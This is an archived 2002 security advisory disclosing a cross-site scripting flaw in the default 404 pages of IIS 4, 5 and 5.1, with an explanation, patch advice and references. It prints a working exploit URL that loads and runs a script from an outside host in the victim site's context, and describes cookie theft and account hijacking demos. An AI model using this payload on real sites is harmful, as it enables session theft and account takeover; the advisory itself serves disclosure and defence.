Thor Larholm security advisory TL#001
Topic: IIS allows universal CrossSiteScripting.
Discovery date: 13 March 2002.
Affected applications:
Any IIS installation that hosts the default 404 error pages. This
includes:
IIS 4
IIS 5
IIS 5.1
Severity: Medium
Impact:
Stealing cookies from any IIS site, cross-domain scripting to any
IIS site, hijacking Hotmail and Passport accounts, elevating priveleges
through ActiveX components, hijacking the MSN Messenger client,
etc.
Introduction:
CrossSiteScripting is a term that describes the injection of script
code on foreign sites. A very likely scenario is where a malicious
programmer would inject code on e.g. hotmail.com to steal a victims
cookies, allowing him/her to hijack the victims email account.
The default installation of IIS is suspectible to such a CSS error.
Discussion:
Every time IIS encounters a HTTP 404 errorcode, it will display
a "404 not found" page.
This HTML file uses scripting to output a link to the SERVER.TLD
part of the URL, and by crafting a specially formed URL it is possible
to include arbitrary script commands on the 404 page, thereby enabling
CrossSiteScripting on any IIS site.
If we look at 404.htm we will notice a particular line of code:
document.write( '<A HREF="' + escape(urlresult) + '">'
+ displayresult + "</a>");
displayResult is derived from the first instance of :// in the URL
until the next instance of /.
This means that we will have to include our script code before the
path part of the URL. To accomplish this we include our script code
in the Basic Authentication part of the URL, but we first have to
escape any special characters in the code. Any / character will
end displayresult prematurely and any spaces will corrupt the DNS
lookup, and we therefor replace any space with a TAB (%09) and any
/ with %5Cx2f (\x2f, as we will dynamically reference an external
file).
Exploit:
http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/SomeNonExistantPath
The above will include and execute http://jscript.dk/test.js on
YOUR.TLD, provided that YOUR.TLD is served by an IIS installation.
Solution:
Apply the MS02-018 patch, or delete the standard 404 errorhandler
page.
You could also use the opportunity to make yourself a nice custom
404 errorhandler page.
End-users can enable the "Show friendly HTTP error messages"
option in IE.
Demonstration:
I have put together some proof-of-concept examples:
Simple static examples - your cookies from a selection of Microsoft
domains.
Short advanced example - get the cookies from any IIS site
Hijacking MSN Messenger - an updated version of a previous bulletin
Links:
MS02-018 patch:
- http://www.microsoft.com/technet/security/bulletin/MS02-018.asp
CAN-2002-0148:
- http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0148
CERT Cross Site Scripting advisory:
- http://www.cert.org/advisories/CA-2000-02.html
|